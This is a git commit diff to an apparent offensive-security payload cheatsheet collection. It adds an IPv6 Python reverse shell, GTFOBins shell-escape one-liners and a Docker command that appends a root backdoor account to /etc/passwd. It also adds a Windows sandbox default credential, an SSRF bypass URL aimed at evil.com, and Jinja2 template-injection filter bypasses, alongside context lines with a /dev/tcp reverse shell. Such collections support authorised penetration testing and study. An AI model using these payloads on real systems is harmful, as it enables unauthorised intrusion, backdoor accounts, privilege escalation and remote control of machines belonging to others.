Shell IPv6 + Sandbox credential

.gitignore

@@ -1,3 +1,4 @@
 BuildPDF/
 .vscode
 .todo
+AWS Amazon Lambda/

Methodology and Resources/Active Directory Attack.md

@@ -39,6 +39,7 @@
   Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
   ./bloodhound
   SharpHound.exe (from resources/Ingestor)
+  SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
   or 
   Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
   ```

Methodology and Resources/Linux - Privilege Escalation.md

@@ -8,6 +8,7 @@
     ```
 - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
 - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123)
+- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
 
 ## Checklists
 
@@ -82,6 +83,28 @@
   * Checks to see if the host has Docker installed
   * Checks to determine if we're in an LXC container
 
+## GTFOBins
+
+[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
+
+The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
+
+> gdb -nx -ex '!sh' -ex quit
+> sudo mysql -e '\! /bin/sh'
+> strace -o /dev/null /bin/sh
+
+## Groups
+
+### Docker
+
+Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
+
+```bash
+$> docker run -it --rm -v $PWD:/mnt bash
+$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
+```
+
+
 ## References
 
 - []()

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -36,10 +36,16 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
 
 Linux only
 
+IPv4
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 ```
 
+IPv6
+```python
+python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
+```
+
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```

Methodology and Resources/Windows - Privilege Escalation.md

@@ -6,6 +6,7 @@
 - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
 - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
 - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
+- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
 
 ## Windows Version and Configuration
 

Methodology and Resources/Windows - Using credentials.md

@@ -23,6 +23,17 @@ Username: RetailAdmin
 Password: trs10
 ```
 
+## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
+
+Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
+
+```powershell
+\\windowssandbox
+Username: wdagutilityaccount
+Password: pw123
+```
+
+
 ## Metasploit - SMB
 
 ```c

SSRF injection/README.md

@@ -159,6 +159,12 @@ List:
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
 
+Bypass filter_var() php function
+
+```powershell
+0://evil.com:80;http://google.com:80/ 
+```
+
 Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
 
 ```powershell

Server Side Template injections/README.md

@@ -1,6 +1,42 @@
 # Templates Injections
 
-> Template injection allows an attacker to include template code into an existant (or not) template.
+> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
+
+## Summary
+
+* [Tools](#tools)
+* [Methodology](#methodology)
+* [Ruby](#ruby)
+  * [Basic injection](#basic-injection)
+  * [Retrieve /etc/passwd](#retrieve--etc-passwd)
+  * [List files and directories](#list-files-and-directories)
+* [Java](#java)
+  * [Basic injection](#basic-injection)
+  * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
+  * [Retrieve /etc/passwd](#retrieve--etc-passwd)
+* [Twig](#twig)
+  * [Basic injection](#basic-injection)
+  * [Template format](#template-format)
+  * [Code execution](#code-execution)
+* [Smarty](#smarty)
+* [Freemarker](#freemarker)
+* [Jade / Codepen](#jade---codepen)
+* [Velocity](#velocity)
+* [Mako](#mako)
+* [Jinja2](#jinja2)
+  * [Basic injection](#basic-injection)
+  * [Template format](#template-format)
+  * [Dump all used classes](#dump-all-used-classes)
+  * [Dump all config variables](#dump-all-config-variables)
+  * [Read remote file](#read-remote-file)
+  * [Write into remote file](#write-into-remote-file)
+  * [Remote Code Execution](#remote-code-execution)
+  * [Filter bypass](filter-bypass)
+* [Jinjava](#jinjava)
+  * [Basic injection](#basic-injection)
+  * [Command execution](#command-execution)
+
+## Tools
 
 Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
 e.g:
@@ -37,7 +73,7 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
 
 ## Java
 
-### Java - Basic injection
+### Basic injection
 
 ```java
 ${7*7}
@@ -47,13 +83,13 @@ ${class.getResource("").getPath()}
 ${class.getResource("../../../../../index.htm").getContent()}
 ```
 
-### Java - Retrieve the system’s environment variables
+### Retrieve the system’s environment variables
 
 ```java
 ${T(java.lang.System).getenv()}
 ```
 
-### Java - Retrieve /etc/passwd
+### Retrieve /etc/passwd
 
 ```java
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
@@ -63,14 +99,14 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
 
 ## Twig
 
-### Twig - Basic injection
+### Basic injection
 
 ```python
 {{7*7}}
 {{7*'7'}} would result in 49
 ```
 
-### Twig - Template format
+### Template format
 
 ```python
 $output = $twig > render (
@@ -84,7 +120,7 @@ $output = $twig > render (
 );
 ```
 
-### Twig - Code execution
+### Code execution
 
 ```python
 {{self}}
@@ -145,7 +181,7 @@ ${x}
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
 
-### Jinja2 - Basic injection
+### Basic injection
 
 ```python
 {{4*4}}[[5*5]]
@@ -155,7 +191,7 @@ ${x}
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on Flask application.
 
-### Jinja2 - Template format
+### Template format
 
 ```python
 {% extends "layout.html" %}
@@ -169,7 +205,7 @@ The above injections have been tested on Flask application.
 
 ```
 
-### Jinja2 - Dump all used classes
+### Dump all used classes
 
 ```python
 {{ [].class.base.subclasses() }}
@@ -177,7 +213,7 @@ The above injections have been tested on Flask application.
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 ```
 
-### Jinja2 - Dump all config variables
+### Dump all config variables
 
 ```python
 {% for key, value in config.iteritems() %}
@@ -186,20 +222,20 @@ The above injections have been tested on Flask application.
 {% endfor %}
 ```
 
-### Jinja2 - Read remote file
+### Read remote file
 
 ```python
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 ```
 
-### Jinja2 - Write into remote file
+### Write into remote file
 
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
 ```
 
-### Jinja2 - Remote Code Execution via reverse shell
+### Remote Code Execution
 
 Listen for connexion
 
@@ -215,10 +251,42 @@ Inject this template
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
 
+### Filter bypass
+
+```python
+request.__class__
+request["__class__"]
+```
+
+Bypassing `_`
+
+```python
+http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
+
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+```
+
+Bypassing `[` and `]`
+
+```python
+http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
+or
+http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
+```
+
+Bypassing `|join`
+
+```python
+http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
+```
+
 ## Jinjava
 
-
-### Jinjava - Basic injection
+### Basic injection
 
 ```python
 {{'a'.toUpperCase()}} would result in 'A'
@@ -227,7 +295,7 @@ Inject this template
 
 Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
 
-### Jinjava - Command execution 
+### Command execution 
 
 Fixed by https://github.com/HubSpot/jinjava/pull/230
 
@@ -242,20 +310,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 ```
 
-## Client Side Template Injection
-
-### AngularJS
-
-```javascript
-$eval('1+1')
-{{1+1}}
-```
-
-### Vue JS
-
-```javascript
-{{constructor.constructor('alert(1)')()}}
-```
 
 ## References
 
@@ -267,4 +321,7 @@ $eval('1+1')
 * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
 * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
 * [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
-* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
+* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
+* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
+* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
+* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)

XSS injection/XSS in Angular.md

@@ -1,5 +1,7 @@
 # XSS in Angular
 
+The following payloads are based on Client Side Template Injection.
+
 ## Stored/Reflected XSS - Simple alert 
 
 > Angular as of version 1.6 have removed the sandbox altogether